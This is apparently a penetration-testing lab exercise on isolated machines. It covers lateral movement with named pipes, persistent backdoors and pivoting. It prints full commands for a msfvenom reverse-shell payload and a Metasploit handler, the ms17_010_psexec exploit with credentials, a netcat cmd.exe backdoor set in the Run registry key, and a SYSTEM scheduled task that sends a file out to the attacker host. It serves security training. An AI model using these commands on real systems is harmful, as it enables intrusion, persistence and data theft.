Exploiting discovered vulnerebilities

 

Exploiting Discovered Vulnerabilities

After you have established the initial connection with the victim’s system, you should be able to exploit the vulnerabilities. For example, you can exploit the SMB vulnerabilities or any application-specific vulnerabilities. You should be able to perform several tasks, such as deploying a backdoor for the current session or even deploy a persistent backdoor. Pivoting is another major task that can be accomplished if you get hold of the right system.

In this exercise, you will learn about exploiting discovered vulnerabilities.

Learning Outcomes

After completing this exercise, you will be able to:

• Switch Off the Windows Firewall on PLABWIN810
• Perform Lateral Movement with Named Pipes
• Create a Persistent Backdoor
• Explain Pivoting

Your Devices

You will be using the following devices in this lab. Please power these on now.

• PLABDC01 - (Windows Server 2019 - Domain Server)
• PLABKALI01 - (Kali 2019.2 - Linux Kali)
• PLABWIN810 - (Windows 8.1 - Domain Member)

Task 1 - Switching Off the Windows Firewall on PLABWIN810

You will need to switch off the Windows Firewall to perform an attack on PLABWIN810. There are attacking methods that you can use to bypass the Windows or any other firewall running on the target. However, for the sake of this module, you will switch off the Windows Firewall and proceed with the remaining tasks.

To switch off the Windows Firewall on PLABWIN810, perform the following steps:

Step 1

Ensure that you have connected to PLABWIN810 and the PLABWIN810 desktop is displayed.

Right-click the Windows Charm and select Control Panel.

Figure 1.1 Screenshot of PLABWIN810: Right-clicking the Windows Charm and selecting Control Panel.

Step 2

The Control Panel window is displayed. On the Adjust your computer’s settings page, click System and Security.

Figure 1.2 Screenshot of PLABWIN810: Clicking System and Security on the Adjust your computer’s settings page.

Step 3

On the next page, several security-related options are displayed. Click Windows Firewall.

Figure 1.3 Screenshot of PLABWIN810: Clicking Windows Firewall.

Step 4

On the Help protect your PC with Windows Firewall page, click Turn Windows Firewall on or off in the left pane.

Figure 1.4 Screenshot of PLABWIN810: Clicking Turn Windows Firewall on or off in the left pane.

Step 5

On the Customize settings for each type of network page, select Turn off Windows Firewall (not recommended) for Domain, Private, and Public network.

Click OK.

Figure 1.5 Screenshot of PLABWIN810: Selecting Turn off Windows Firewall (not recommended) for Domain, Private, and Public network.

Step 6

On the Help protect your PC with Windows Firewall page, notice that Windows Firewall is now turned off for Domain, Private, and Public network.

Figure 1.6 Screenshot of PLABWIN810: Verifying the Windows Firewall status and closing the Control Panel.

Close the Control Panel window and the PLABWIN810 window.

Task 2 - Lateral Movement with Named Pipes

Lateral movement is performed after exploiting a system. You, as the attacker, then look at the possibility of finding other systems or devices that can be exploited. After you have found vulnerabilities on other hosts, you can move from the existing host to the new hosts. The attackers typically target the remote services that can be exploited for lateral movement. In the command line, you can use services, such as telnet, rlogin, and SSH. In the GUI environment, depending on the type of platforms, such as Windows or Apple, you can use Remote Desktop Protocol (RDP), VNC, or Apple Remote Desktop (ARD).

You can also perform lateral movement using a named pipe.

A named pipe is a method that is used by two applications or programs to communicate with each other. The named pipe communication is encapsulated within the SMB protocol. After you gain access to a system within a network, the named pipes can be used for lateral movement in a stealthy manner.

In this task, you will learn to perform the lateral movement with named pipes. To do this, perform the following steps:

Step 1

Ensure you have powered on all the devices listed in the introduction and connect to PLABKALI01.

On the PLABKALI01 desktop, double click the Terminal icon.

Figure 1.7 Screenshot of PLABKALI01: Clicking the Terminal icon on the left pane.

Step 3

You will first create a Meterpreter agent using Msfvenom. You can then use Metasploit to use named pipes for controlling agents.

Type the following command:

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.3 lport=443 -f exe > shell.exe

Press Enter.

Figure 1.8 Screenshot of PLABKALI01: Creating a meterpreter agent using msfvenom.

Step 4

Next, you need to ensure that this file is available to the target system. You can start the SimpleHTTPServer, which will make the file available. To do this, type the following command:

python -m SimpleHTTPServer

Press Enter.

Figure 1.9 Screenshot of PLABKALI01: Entering the command to start the SimpleHTTPServer.

Step 5

Notice that the SimpleHTTPServer has now started.

Figure 1.10 Screenshot of PLABKALI01: Showing the SimpleHTTPServer Webserver started.

Step 6

Now, you need to create a Metasploit handler to accept the connection back to your system. To do this, you need to open the Metasploit Framework.

Minimize the terminal window and on the desktop, double click the metasploit framework icon.

Figure 1.11 Screenshot of PLABKALI01: Clicking the metasploit framework icon in the left pane.

Step 7

Terminal window is displayed. To run the metasploit framework, type:

msfconsole

Note: The number of exploits and payloads will change from time to time.

Figure 1.12 Screenshot of PLABKALI01: Showing the msfconsole command enetered.

Step 8

The Metasploit framework is started now.

Figure 1.13 Screenshot of PLABKALI01: Showing the msf5 prompt after the Metasploit framework starts.

Step 9

You will now use the multi-handler exploit. To do this, type the following command:

use exploit/multi/handler

Press Enter.

Figure 1.14 Screenshot of PLABKALI01: Entering the handler command at the msf5 prompt.

Step 10

Now, set the reverse_tcp as the payload. To do this, type the following command:

set PAYLOAD windows/meterpreter/reverse_tcp

Press Enter.

Figure 1.15 Screenshot of PLABKALI01: Entering the command to set the reverse_tcp as the payload.

Step 11

Next, you need to set the local host for reverse_tcp. To do this, type the following command:

set LHOST 192.168.0.3

Press Enter.

Figure 1.16 Screenshot of PLABKALI01: Entering the command to set the localhost.

Step 12

Now, set the port on which you will accept the connections. To do this, type the following command:

set LPORT 443

Press Enter.

Figure 1.17 Screenshot of PLABKALI01: Entering the command to set the local port.

Step 13

You can set if the listener should close on the exit of the session. Type the following command:

set ExitOnSession false

Press Enter.

Figure 1.18 Screenshot of PLABKALI01: Entering the command to set ExitOnSession as false.

Step 14

Now, run the exploit. Type the following command:

exploit -j -z

Press Enter.

Figure 1.19 Screenshot of PLABKALI01: Entering the exploit command to trigger the exploit.

Step 15

The reverse_tcp handler has now started.

Figure 1.20 Screenshot of PLABKALI01: Showing that the reverse_tcp has started.

Step 16

Connect to PLABWIN810. Click the Internet Explorer icon on the taskbar.

Figure 1.21 Screenshot of PLABWIN810: Clicking the Internet Explorer icon on the taskbar.

Step 17

The Internet Explorer window is displayed. In the address bar, type the following command:

http://192.168.0.3:8000

Press Enter.

Figure 1.22 Screenshot of PLABWIN810: Entering the Webserver URL in the address bar.

Step 18

Notice that the shell.exe is listed in the file listing. Click shell.exe.

Figure 1.23 Screenshot of PLABWIN810: Showing the listing of files on the Webpage and then clicking the shell.exe file.

Step 19

In the notification bar, click Run.

Figure 1.24 Screenshot of PLABWIN810: Clicking Run in the notification prompt.

Step 20

You are back on the file listing.

Figure 1.25 Screenshot of PLABWIN810: Showing the listing of files on the Webpage.

Step 21

Switch back to PLABKALI01. Notice that a session is now opened with the target system.

Figure 1.26 Screenshot of PLABKALI01: Showing the start of the reverse_tcp session.

Step 22

Press Enter and type the following command:

sessions

Press Enter.

Figure 1.27 Screenshot of PLABKALI01: Entering the sessions command.

Step 23

Notice that a session is established with the target system.

Figure 1.28 Screenshot of PLABKALI01: Showing a listing of established sessions with the target system.

Step 24

You need to now switch to session 1. To do this, type the following command:

sessions -i 1

Press Enter.

Figure 1.29 Screenshot of PLABKALI01: Entering the command to select the session 1.

Step 25

The meterpreter command is displayed.

Press Ctrl + l to clear the screen.

You need to create a pipe listener now. Type the following command:

pivot add -t pipe -l 192.168.0.3 -n bgpipe -a x86 -p windows

Press Enter.

Figure 1.30 Screenshot of PLABKALI01: Entering a command to create a pipe listener.

Step 26

You can list the active pipe listeners. To do this, type the following command:

pivot list

Press Enter.

Figure 1.31 Screenshot of PLABKALI01: Entering the command to show the pivot list.

Step 27

Notice that there is one active pipe listener.

Figure 1.32 Screenshot of PLABKALI01: Showing the list of pivot listeners

Close all open terminal windows.

Note: The next tasks require you to use a different Metasploit module, and therefore, just to be sure, you will restart the terminal and Metasploit Framework.

Task 3 - Create a Persistent Backdoor

Exploiting a system is just the beginning of penetrating a network. You need to find methods to keep you inside the system. You can use different methods for this purpose. For example, you can create a user account on a system and assign it to the local administrator’s privileges. You can also use a shell to extract hashes for password extraction. One of the best methods to remain in a network is to create a persistent backdoor, which will allow you to extract information or allow you to get into the system.

Alert: To perform these tasks on PLABWIN810, ensure you have switched off Windows Firewall.

To create a persistent backdoor, perform the following steps:

Step 1

Ensure you are connected to PLABKALI01. Click the Metasploit Framework icon on the desktop. In the terminal window displayed, run the command:

msfconsole

After it has created and initialized the database, you should see the msf prompt.

Figure 1.33 Screenshot of PLABKALI01: Showing the msf5 prompt after the Metasploit framework starts.

Step 2

You will use the psexec module in this case. To do this, type the following command:

use exploit/windows/smb/ms17_010_psexec

Press Enter.

Figure 1.34 Screenshot of PLABKALI01: Entering the PsExec command at the msf5 prompt.

Step 3

Next, set the remote host that you want to exploit. Type the following command:

set RHOST 192.168.0.5

Press Enter.

Figure 1.35 Screenshot of PLABKALI01: Setting the remote host for exploitation.

Step 4

Now, set the username that you want to use to connect to the remote host. Type the following command:

set SMBUser admin

Press Enter.

Figure 1.36 Screenshot of PLABKALI01: Setting the SMBUser as admin.

Step 5

Clear the screen by pressing Ctrl+L

After setting the username, you need to use the password for the same account. Type the following command:

set SMBPass Passw0rd

Press Enter.

Figure 1.37 Screenshot of PLABKALI01: Setting the password for the SMBUser.

Step 6

Next, you will run the exploit to gain access to the remote system. Type the following command:

run

Press Enter.

Figure 1.38 Screenshot of PLABKALI01: Running the exploit using the run command.

Step 7

The meterpreter session with the remote system is now established.

Figure 1.39 Screenshot of PLABKALI01: Showing the established session with the victim and showing the victim’s system as exploited.

Step 8

You will now send a backdoor to the remote system. To do this, type the following command:

upload /usr/share/windows-binaries/nc.exe C:\\Windows

Press Enter.

Figure 1.40 Screenshot of PLABKALI01: Entering a command to upload the nc.exe file to C:\Windows

Step 9

Notice that the file is now uploaded to the C:\Windows directory on the remote host.

Figure 1.41 Screenshot of PLABKALI01: Showing the successful upload of the nc.exe file

Step 10

Next, you need to enumerate the registry keys. Type the following command:

reg enumkey -k HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run

Press Enter.

Figure 1.42 Screenshot of PLABKALI01: Entering a command to enumerate the registry keys.

Step 11

Press Ctrl + l to clear the screen.

The registry keys are now enumerated. Now, set the nc.exe to start on Windows startup. Type the following command:

reg setval -k HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run -v nc -d ‘C:\Windows\nc.exe -l -p 1234 -e cmd.exe’

Press Enter.

Figure 1.43 Screenshot of PLABKALI01: Entering a command to set the nc.exe file to start on Windows startup

Step 12

Press Ctrl + l to clear the screen. The registry key was set successfully.

To verify this, type the following command:

reg queryval -k HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run -v nc

Press Enter.

Figure 1.44 Screenshot of PLABKALI01: Entering a command to verify the addition of registry keys.

Step 13

Notice that the registry key values are displayed. This means that the registry key was added successfully.

Figure 1.45 Screenshot of PLABKALI01: Showing the successful addition of registry keys.

Step 14

You need to reboot the remote system now. Type the following command:

reboot

Press Enter.

Quickly, type the following command to exit from the meterpreter session:

exit

Press Enter.

Figure 1.46 Screenshot of PLABKALI01: Entering commands to reboot the target system and exiting from the meterpreter session.

Step 15

Minimize the open window to reach the desktop. Open another Terminal Window.

On the new terminal window displayed, start the Netcat listener. Type the following command:

nc -v 192.168.0.5 1234

Press Enter.

Figure 1.47 Screenshot of PLABKALI01: Entering a command to start the Netcat listener.

Step 17

Notice that you have gained access to the Windows prompt.

Note: It is quite likely that you will be prompted with Connection Refused error. Connect to PLABWIN810 and keep its window open. You should then be able to run this command.

Figure 1.48 Screenshot of PLABKALI01: Showing the Windows command shell.

Step 18

Connect to PLABWIN810. Notice that the nc.exe command window is now open.

Figure 1.49 Screenshot of PLABWIN810: Showing the nc.exe shell on the Windows reboot.

Step 19

Minimize the nc.exe window. Right-click the Windows charm and select Run.

Figure 1.50 Screenshot of PLABWIN810: Right-clicking the Windows charm and selecting the Run option.

Step 20

In the Run dialog box, in the Open textbox, type notepad and click OK.

Figure 1.51 Screenshot of PLABWIN810: Entering the notepad command in the Run dialog box.

Step 21

The Notepad window is displayed. Type the following text:

James 1234567890
Ron 0987654321

Figure 1.52 Screenshot of PLABWIN810: Entering data in a notepad file.

Step 22

Click File and then select Save As.

Figure 1.53 Screenshot of PLABWIN810: Saving the file using File ( Save As option.

Step 23

From the left pane, expand This PC and select Local Disk (C:). In the File name textbox, type the following:

plab.csv

From the Save as type drop-down, select All Files and click Save.

Figure 1.53 Screenshot of PLABWIN810: Saving the file as plab.csv in the root of C drive.

Step 24

Close the plab.csv file.

Figure 1.55 Screenshot of PLABWIN810: Closing the plab.csv file.

Step 25

Connect back to PLABKALI01. In the terminal window, type the following command:

whoami

Press Enter.

Figure 1.56Screenshot of PLABKALI01: Entering the whoami command in the Windows command shell.

Step 26

Notice that you have the domain administrator access.

Figure 1.57 Screenshot of PLABKALI01: Showing the output of the Windows command shell.

Step 27

You need to close the Netcat session now. Press Ctrl + c.

Figure 1.58 Screenshot of PLABKALI01: Closing the Netcat session by pressing Ctrl + c keys.

Step 28

You need to create a Netcat listener now to get hold of the plab.csv file, which is a confidential file.

Clear the screen with the clear command. Type the following command:

cat > task.bat

Press Enter.

Figure 1.59 Screenshot of PLABKALI01: Creating a Windows batch file named task.bat.

Step 29

A new file has been created. Type the following commands:

@echo off
C:\Windows\nc.exe -w 3 192.168.0.3 1234 < C:\plab.csv

Press Enter after each statement.

Figure 1.60 Screenshot of PLABKALI01: Entering the commands in the task.bat file.

Step 30

To save and exit the file, press Ctrl + z.

Figure 1.61 Screenshot of PLABKALI01: Saving the task.bat file by pressing the Ctrl +z keys.

Step 31

Next, you will create a scheduled task on the remote system to run the Netcat listener.

To do this, bring the msf5 prompt window in front and type the following command:

run

Press Enter. You are back at the meterpreter prompt.

Figure 1.62 Screenshot of PLABKALI01: Entering the run command to start the meterpreter session.

Step 32

You need to upload the task.bat file to the remote system. To do this, type the following command:

upload /root/task.bat C:\\Windows

Press Enter.

Figure 1.63 Screenshot of PLABKALI01: Entering the command to upload the task.bat file in the C:\Windows directory.

Step 33

Notice that the file is uploaded to the remote system.

Figure 1.64 Screenshot of PLABKALI01: Showing the successful upload of the task.bat file.

Step 34

Press Ctrl + l to clear the screen.

Next, you will create a scheduled task to run the batch file that you had created. Type the following command:

execute -f ‘schtasks /create /tn plabtask /tr C:\Windows\task.bat /sc minute /mo 1 /ru system’

Press Enter.

Figure 1.65 Screenshot of PLABKALI01: Entering a command to create a scheduled task on the target system.

Step 35

Notice that the task has been created.

Figure 1.66 Screenshot of PLABKALI01: Showing that the scheduled task has been created successfully and a process ID has been generated.

Step 36

Within the PLABKALI01 system, switch to the other terminal window and type the following command:

nc -l -p 1234 > plab.csv

Press Enter.

Figure 1.67 Screenshot of PLABKALI01: Entering a command to start the Netcat listener.

Step 37

The Netcat listener has started.

Note: You will need to wait for one minute.

Figure 1.68 Screenshot of PLABKALI01: Showing that the Netcat listener has started.

Step 38

Clear the screen with the clear command.

Notice that the nc command completes. To view the contents of the file, type the following command:

cat plab.csv

Press Enter.

Figure 1.69 Screenshot of PLABKALI01: Entering the cat command to view the plab.csv file’s content.

Step 39

Notice that both the contacts are listed.

Figure 1.70 Screenshot of PLABKALI01: Showing the contents of the plab.csv file.

Step 40

Switch to PLABWIN810. Open the plab.csv file and make the following entry:

Harry 2345678901

Save and close the file.

Figure 1.71 Screenshot of PLABWIN810: Making a new entry in the plab.csv file on the target system.

Step 41

Switch back to PLABKALI01.

You need to run the Netcat listener again. Type the following command:

nc -l -p 1234 > plab.csv

Press Enter.

Note: As before, you will need to wait for one minute.

Figure 1.72 Screenshot of PLABKALI01: Entering a command to start the Netcat listener.

Step 42

You are returned to the prompt after one minute. Now, verify if the contents have been updated on your system. Run the following command:

cat plab.csv

Press Enter.

Figure 1.73 Screenshot of PLABKALI01: Entering the cat command to view the plab.csv file’s content.

Step 43

Notice that the new entry that you made has also been updated. Remember that every time that file is updated, you can run the Netcat listener and get the updated details.

Figure 1.74 Screenshot of PLABKALI01: Showing the contents of the plab.csv file.

Close all the terminal windows.

Task 4 - Explain Pivoting

Pivoting is similar to lateral movement, as both the tasks take place after you exploit a host. In a lateral movement, you move from one host to another host and look for more vulnerabilities to exploit. In pivoting, you exploit the vulnerabilities in one host, and then you explore the options of exploiting a host and then make a move to the other hosts that are connected with the first. These hosts would possibly be not accessible otherwise. These hosts are typically located on a different subnet and, therefore, are difficult to reach without direct access.

Figure 1.75 Screenshot of Network Pivoting: Showing the pivoting method.

In the given example, the attacker is located on 81 subnet, but the target systems that the attacker wants to exploit are located on 63 subnets. If there is a direct attempt made to connect with these hosts, the firewall in between blocks the connection. Therefore, the attacker is prevented from proceeding further.

The attacker, however, then targets the Webserver, which is located on the same subnet as his own system. The Webserver has the connectivity to the 63 subnet, and therefore, for the attacker, it would be easy to target the Webserver. If SSH is enabled on the Webserver, then it makes the job easier for the attacker.

After exploiting the Webserver, the attacker can then perform the lateral movement by forwarding the connections from the Webserver to the systems on the 63 subnet. The attacker, even though blocked by the firewall, can now reach the systems on 63 subnet.

Pivoting can be of different types:

Port Forwarding

This is one of the most widely used methods in which the attacker finds an open port on the exploited host and then uses it to forward traffic to the target system.

SSH Pivoting

SSH is used in this method. You need to setup a local proxy and also enable port forwarding. The connections that are made to the port using the specified port, they are forwarded to the end target.

Routing Table Pivoting

When you exploit a host, you can make changes to its routing table. Along with this, you can set the gateway as the exploit session. When this is done, the traffic must pass through the gateway to reach the destination.

VPN pivoting can also be performed even though it is mostly used for the reconnaissance of a network.

Keep all devices that you have powered on in their current state and proceed to the review section.